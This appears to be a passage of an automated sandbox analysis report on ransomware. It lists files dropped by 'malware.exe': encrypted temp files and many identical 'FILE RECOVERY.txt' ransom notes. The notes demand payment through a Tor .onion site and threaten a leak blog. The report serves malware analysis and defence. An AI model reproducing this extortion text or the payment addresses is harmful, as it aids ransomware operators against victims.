                        Preview:.oM.2...D}ip.A..9Z...?..p.?!...F.w.z.n..EPK.3.,....p.(Ut..<...<.....w&...1.9.L..U..."...O.....|...Qh...(...Z.)s....XSA....Q..d`C..f.DgX...J.o.$".1L'3...E^.X.3.......Y0I.eM..XQ...h.+d.j)..Z..!.v#s...w.%...0..{.r.............K..oQ...A..`c....M...B........m.F.OR.83....0...|..2.p8.ra.....1.,...}.. M~.{nU].....6........T.tw.3G.m...............;.:x>v.!../.j#...d%fH4.G...kL..9..C......$n.a...1..[.........._.k..?.l."".....VP9......P>..&(.x..4mno.|.i.....[...7.<..n...1.=T...[g.5.(.o.(..b.@.....L...O..);.W86.O.*z%.x...A/..'..6Ou...b~*...N..Cx..l%.)Si...=..P.9b^....w..*,.a.....J.Px.A..qZ.(.9............"..6...c".Na..1..7.5..Qx...nM..2........@&:6....@......G..,*n....@v.{'.#7..2.~&.ko..-.z...w.D...b.....*......H.].Y(..J..........7,-...[..9...O...8.l(.B.. ..........h<..6tG.y.D.+......Q_./2....3e(.`O........B....L...}.e...'r,......wB.LJ./h...i{..J.RV.... #...T..i{........Q.#..k..m...E^..P...N.#..m:Z3.Rl.......@.>..^.'......oeD..`0.!.!...@...{e~....j..[.]....

                        C:\Users\user\AppData\Local\Temp\wctDB2E.tmp

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):64962
                        Entropy (8bit):7.997164962019162
                        Encrypted:true
                        SSDEEP:1536:9FXGY9OTYHxqhogtJ07PEpiZUk4Pku/qRH/q+thYJxZbfx1+tpgOm/BlCH:vW2HxqXEJZUeu/qZq2hG74qOmvCH
                        MD5:D847D2D6E228598B201AC35FEEB7E2B4
                        SHA1:5C25EF4B462D1577AAD3F6E0A594DE6B690C511C
                        SHA-256:13FB890D3DA8EB83C5B1E836B88D6012CD494B53E4B89CD571F1AE123C0A600C
                        SHA-512:54E9351C82A8701BF6709F9AB0BA24E6707A6FBDC2535366DB6A7FB99CCE209925E2EE9C92F4041B5E7F5549C0F71AE3553123E69FEF01F67E5A5062628B3EA8
                        Malicious:false
                        Preview:..En.dp..7...]...''..4.....$.....LF.z.{5.Z.Z....*Z......7....8..{.f..6D......{.H...F.L....t.../.4..~{>..4.3....Y.c!"..-b$..1........,."p.r..$.T"....".Y..e1.t..>q.........uBb\..PKC..@.....VIt.1j-.y9[.B..tq!.v5...V.h...,.8.K...P....S=..5p...n..T/.QfG,7.5T..>l.4.(........G...(....(0jU.>0...z..PBr....[L.F..r%.J.%VD....&KX/6.....T.{.d....V.....g68^...by......Bj.t.....4..fc.....o.....\.P.c.-.@$...$.....2...p.."......l..N.........S..1.u:.....b.K....._'.M...#...qr.{...s.2..}:G.~.+.~..H?#U...Qfv..V..M#....O..h2.....P$.D.%,...p.....XS..=...h...q...=.:.-t..K.._...|.d..'.#.%......_9......V.^...J_X.5. ..Dp-;.qZ=.V.....[.......".^.tL...53x...H...I&c.=6.N....g...7).[.;......J......,.a.+......TE....{..$N...........N.}....5....;....>j...W.......,(...0.....x.S .g..wHV_\...O.....:+.N......a..WE`...w........_.<31../"9..P.L =..r..h.\...........r%...v...."..r..q..+"cJ..*."k*.......!p..5.R{cM....V.j.cDC..`......j.|'....{..w..}q...0..`..RC:j._.....y......

                        C:\Users\user\AppData\Local\Temp\wctE4A4.tmp

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):74299
                        Entropy (8bit):7.997188796479706
                        Encrypted:true
                        SSDEEP:1536:7hbxYuy6Cz0/J+bP/ulQhI6tXV9jpkd88HSCb:tdFy6CbbP/hI6tXVDQx
                        MD5:40ECF1D51CFEAAA0E68104CB7689D0B7
                        SHA1:4AF113B82FAC5B8F655C12767447AAC866BC04A7
                        SHA-256:C77E9554070E877976DD3A2BFDB3997DBD8F16BF7A729B6F3E0E55D7F4229E49
                        SHA-512:307F5585625B56258FFC6F0D5B39D5BD9777A68131A165958041C1A816512B21B8B2456978D5A01488D0C642CAEDF8099163F76679A72EE8D4A14798C10CCCE0
                        Malicious:false
                        Preview:h..<'.....(='Q.\+....k.7...T....'...g......g|.;.M..4..zO...|Q....i9...$? .|.m...$.b...:....O.2.R%u......r.9..:..F..`.O...H...W........9.._om..dJ......K.....>..y9..O..~.h.r`O....k..mQ|..;.]_.....f`.,{....S..d2.$.$........^)6.Ry......x.*jK.X..ipP&...*.A...T8u&]..|....5.~....{j.^.|h3..m.e`..*.......Z.4(..Q.....zO.G1..P.odW`....b.a.F...Oi.0......B.Y..XTO.V...........R...qS.zN.....o...%7j..d6...?JO....k@.. !....W$.V.B.zj_z.~....:Sv:...b...=.H[.yi|..cK.x{h..E&..U..5...w.7Ch./...`.g...?.....4..f.^....X.......s.......H.UX.$....1..uw.....^L........../%.E.H..s..`,.wl....oRB..4rF....*.sdH........>...3.70.....b...Ys...c....!..P.r.S..+.....5.C..).....B[$.t......[AM......YT.... .@.d~....k.4...@......["....U....Z.....9SPc.....:..t.*.3K.#..xxX.v..A..g..IW......^......$A..Q...'.......o..F..h.....?X.Tw.3a&.1`....(. Q..Y.."..z..j..=.-.3G......x6......".[..v.]..Z.~S....'.2HO..P........fsh...KX...r..p....b...5......l..:!#.T3.4..K...m.r.].vZ.l.lJ`.....Y..w.ln5

                        C:\Users\user\AppData\Local\Temp\wctEA40.tmp

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:Dyalog APL version -50.67
                        Category:dropped
                        Size (bytes):74314
                        Entropy (8bit):7.997495099054157
                        Encrypted:true
                        SSDEEP:1536:a41lpL/QZBLorEvpYXXZR9s4W/SF/c+1JgRwbEB2qHxA23Y0fXNBt9uh2qab:a41sBL5vWb0Sh12HY8NB62qab
                        MD5:6030328EAFFF79683AE075D1DE60DAFA
                        SHA1:B3CA46097743C6669A3899DC572EE37652F6DC5B
                        SHA-256:14EEB19A23D4607906E417834B32645926726E44F7E9D8FBECAE5C0A72CD13B9
                        SHA-512:0CABEF65EAEE865314BAF76BC43F2784253C167656C0850548CFEF6BA979E293121826AF51403CB1E2B708B26D6BFA3B3671DC7353A902F116A75240D3D2A394
                        Malicious:false
                        Preview:...C.t.;k.;|.lM...Z. ....L0Tt.UW...u.wEoD.tL.Z..E......c...7]....6...J....]..U..!v7x..*#..6..............K<....H........F].y..W.*..c.I..1). ......'.t..f....yw<..0_..-.9.N.5...>...jt/...a......{8.$X...I.0.....2,C.R....:n.I.A...m.'y.....\.#3..'>.O.U-..iX...*9.......B..!ag..l(..."Q.@.`..AG ..<";..E......t.q,d.vQo|.5.....m.G....B...IjX..U7..IX....Z....H..R.1..V.....[!W...k..a|..O.BD^.7.PTaod.H~.#$.Z..#........}EL'...)E....=7E)2I|.0c...."-..........n.G...T..An..#k*|........>..'....&...f=.....6....{;.qS..I).....w./..X?{+...7;i.G.}..~..O.[..UZ......Z.c.xj.I>.Wun).p. .|...q$:.!.+..J.... .....u....[M...{...;4A=.'X..k..5.......;=.D.Qx..3....JK.......q^.q.=..p/..g.d..n..a>.!....u..y;/..]...~.Zo_h......<..N...B..R..3".~.ma..ZO.....g..P..n..G._."....Q..&..m5.3E.F.._.O..|..H.?K....$1.6.LVt.\Ra.:+.S%....w............i+d.I#G..x../G.lX.o.....]'.w..hZ..\];..A.Du..;%=...HS...zM.~N.K_P.W.6...4I:.wz.......c#..Yl...@..F..7..cw....G..>..m..8S.7.Y.[.....Z.[....]<....

                        C:\Users\user\AppData\Local\Temp\wctF411.tmp

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):74299
                        Entropy (8bit):7.99748396299925
                        Encrypted:true
                        SSDEEP:1536:5RkVJTUQBP1LbLM7tZ+FMqV/i96eC2x0e3T/KbJGLpjnkXcPIYLO0MzCV3:vkDUmP1LnM7tZrqV/e6z653T/KApYXcB
                        MD5:16414DD37E971AACDACE328E29D5ABF3
                        SHA1:9AD64CF28FEC1CEB2EFB7777C9B01AFDB902266C
                        SHA-256:1095630190FE81B0A5D9AB54D7DF2B7C9D893581924FD70FD5F094F11120FC8D
                        SHA-512:3BFC737CEBC90ACBCD281A0645600150344C502B7DF08D020819AEC2AC6736C9746B983D7D5F5EE4AF543CAC433F24F5EBCBEC994D10F0E9FFFBFE50E4278CEA
                        Malicious:false
                        Preview:G.....l.8I...2.....@..._..G.M7`K`..PI...Np"..yF@......H7.......>.F.b.....b.tW.1u:c#...cE...V+.8S.._...._h.v..p.XPs`...,.<....L.0.d..ww.|\.N}V.Q.U.. 2...O.).._FQ....<..bz.e....%..E.....$~....k.....{_k.$.B..-...:......N...T.}&.........@..d-~....p..N.at.;.........E\~...%....F.,..K..=....`.Mp.iE.g...t.x .8_r^....C....M.6.X.yn.M..K7.....)......5.w..t.x.m...X....K......8.4.^..3 D6.AP..!..J./..P.5o.E[.......`?:.I@.l.R8..t...1..Sm..8..0...-)...1@n.........54...x..6.....>}f.V.....D.c...7.F.)......I.m..W9QP.v.1.i..9#.....v...!...?.y.2.N.........x.~..!\...=5...,y..(mx7..S.K..W .G.C..;...@.....".f.f.[...G..TK.............I=.K....Z...Mg(.Qyq..L..3..,'.......J2..Y.......7...*...2..8A.&.G..Q.....j..[....g.....{B.geO...C.&}F.>....U..a.>._Fv..4#U.;&...I....m.z.$.v.<...C2...t...3....xp9|-....x.b....Y....K...>.Z..l...M...S.*e.7...b&YXI.k.X...D&8.o.....b9..]...X..o.f..%.<.N...3....Y.....J...*...;..u..?...........E..y#[..F].F.n.IW...-.9...../...._.....

                        C:\Users\user\AppData\Local\Temp\wctF86A.tmp

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):42164708
                        Entropy (8bit):7.977350097967637
                        Encrypted:false
                        SSDEEP:786432:xWGEDAJPU5Lc/QESiVdd+KqKygPmhf0FKxCRn65wX/g8Qz6g9Hb:xrEMJPUELzHygPmhfQKx+X/UVHb
                        MD5:375942537A3FB65974774DAEB797B50F
                        SHA1:D560CCB4B07E3120CE17C94824D7A389E4FC21A4
                        SHA-256:74B62D36D30E6D44DEE7B33FD1FA675EE92291AA6817F9309A2D9531B550FACF
                        SHA-512:036932E359EDEC957CB192773A56D8BCDC96B522ABA9694A334FE0EF08871286487828D49B895C864C91D07D5F1098A747DDD4D97B1E191DD5C61371A5E49CE2
                        Malicious:false
                        Preview:.cr..q..FH.2.."..p?.\..j..E.|..<:......E.K..}..|5..........x.n..dT.._.F........l..hP_=e.B...q./.k.Mz.....O...|.(........]....A.*...X.ynm.&..H.5..m.^....[....CS.T.....,++.........c..tTyK..&h^...jX.=.R...~..t.G.(....[.=(.......2w..).Z..,...O...Cw...x..c..h..VOf,.D...sV~..J...q........Pu...!.X...f....Z..... Y/..[.<...>..;Rl..Y.......W..^..:o..V.F.d)...u].q...P.d.>.+..pj."4.............:c.`:.X.][v.A.A.w..(.pi..!...'JG....}..KX...)#sZ..e.1O.L..9..??.......L....G.....(......>..]...M2..&'.G....\..N...$.I?m.y)..c.h.b....t.$. ]4.4."i.1"I.%......IPs...|t',/.6QY.;...".....Akc.~'....l.........`Ob?a.,...E..W...{..4.#/*\,".~|Kv...].=......#?.gu{..r.<e........+...Er.Q.n....j."m..f.$..[0u...}J......V...8.E.........)....3.\...X..l.m..@..5.}e.F....p...#.........AV.\>1Ab.....!gIU.R.k........Q3E..IB.|.(.....yqV..Kja......q........[.h...:n@.&.6W.....f'!. .U......g..g..-.....\4.G.+..m.jZ....cS/..,.R&....V0[fK...v 0..ip.O+. .g415.. .....p...YP...C~......=...

                        C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\bc49718863ee53e026d805ec372039e9_9e146be9-c76a-4720-bcdb-53011b87bd06

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):46
                        Entropy (8bit):1.0424600748477153
                        Encrypted:false
                        SSDEEP:3:/lbq:4
                        MD5:8CB7B7F28464C3FCBAE8A10C46204572
                        SHA1:767FE80969EC2E67F54CC1B6D383C76E7859E2DE
                        SHA-256:ED5E3DCEB0A1D68803745084985051C1ED41E11AC611DF8600B1A471F3752E96
                        SHA-512:9BA84225FDB6C0FD69AD99B69824EC5B8D2B8FD3BB4610576DB4AD79ADF381F7F82C4C9522EC89F7171907577FAF1B4E70B82364F516CF8BBFED99D2ADEA43AF
                        Malicious:false
                        Preview:........................................user.

                        C:\Users\user\Contacts\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\Desktop\DTBZGIOOSO\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\Desktop\DVWHKMNFNN\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\Desktop\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\Desktop\HTAGVDFUIE\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\Desktop\JSDNGYCOWY\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\Desktop\NIKHQAIQAU\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\Desktop\ONBQCLYSPU\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\Desktop\SQRKHNBNYN\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\Desktop\WKXEWIOTXI\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\Desktop\XZXHAVGRAG\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
